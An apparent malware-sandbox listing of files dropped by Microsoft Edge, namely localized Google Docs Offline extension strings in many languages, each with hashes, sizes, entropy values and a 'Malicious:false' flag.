                                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                      Encrypted:false
